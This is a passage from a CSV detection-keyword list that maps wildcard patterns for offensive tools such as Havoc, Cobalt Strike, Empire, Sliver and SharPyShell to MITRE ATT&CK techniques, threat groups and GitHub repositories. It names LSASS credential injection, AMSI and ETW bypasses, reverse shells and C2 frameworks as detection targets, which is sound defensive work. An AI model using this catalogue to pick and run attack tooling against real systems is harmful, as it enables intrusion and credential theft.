& RX and then encrypting/decrypting its contents,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ShellcodeFluctuation,1,1,N/A,10,10,770,143,2022-06-17T18:07:33Z,2021-09-29T10:24:52Z -*Initializing domainDumper()*,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*initstring/cloud_enum*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,1,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -*inject 1337 /*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject shellcode*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*inject.spawn*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject.spoofaddr*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*inject_dll_reflective.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*inject_dll_srdi.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*inject_shellcode.py*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z 
-*inject_shellcode_self*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*inject-amsiBypass *,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectAmsiBypass,1,0,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*inject-amsi-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*inject-amsiBypass.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/boku7/injectAmsiBypass,1,1,N/A,10,10,362,67,2023-03-08T15:54:57Z,2021-07-19T00:08:21Z -*inject-assembly *,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,0,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*inject-assembly.cna*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*injectassembly.x64.bin*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*injectassembly.x64.o*,offensive_tool_keyword,cobaltstrike,Inject .NET assemblies into an existing process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/inject-assembly,1,1,N/A,10,10,449,75,2022-01-19T19:15:11Z,2022-01-03T15:38:10Z -*Inject-BypassStuff*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectDll.cpp*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*InjectDll.vcxproj*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*injected into LSASS*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectedCredentials.csv*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*injectEtwBypass*,offensive_tool_keyword,cobaltstrike,CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/injectEtwBypass,1,1,N/A,10,10,253,54,2021-09-28T19:09:38Z,2021-09-21T23:06:42Z -*inject-etw-bypass*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*injectify*,offensive_tool_keyword,injectify,Perform advanced MiTM attacks on websites with ease.,T1557.001 - T1190 - T1071.001 - T1056.001,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/samdenty/injectify,1,0,N/A,N/A,7,650,122,2022-07-20T15:02:37Z,2017-11-06T17:01:50Z -*Injection* -ProcName lsass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Injection\Spawn32*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Injection\Spawn64*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*Injection-Exploit-1.0-SNAPSHOT-all.jar*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*Injections/Traversal.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Injections/XSS.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*Inject-LocalShellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*InjectMate.py*,offensive_tool_keyword,burpsuite,Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. 
and more).,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*InjectMateCommunity.py*,offensive_tool_keyword,burpsuite,A collection of scripts to extend Burp Suite,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/laconicwolf/burp-extensions,1,1,N/A,N/A,2,136,34,2019-04-08T00:49:45Z,2018-03-23T16:05:01Z -*Injector.exe*,offensive_tool_keyword,POC,POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access,T1210.001 - T1213 - T1212 - T1201,TA0007 - TA0002,N/A,N/A,Exploitation tools,https://github.com/ZecOps/CVE-2020-0796-LPE-POC,1,1,N/A,N/A,3,242,90,2020-04-02T08:01:38Z,2020-03-30T16:06:50Z -*injector.ps1*.kirbi*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*InjectPERemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 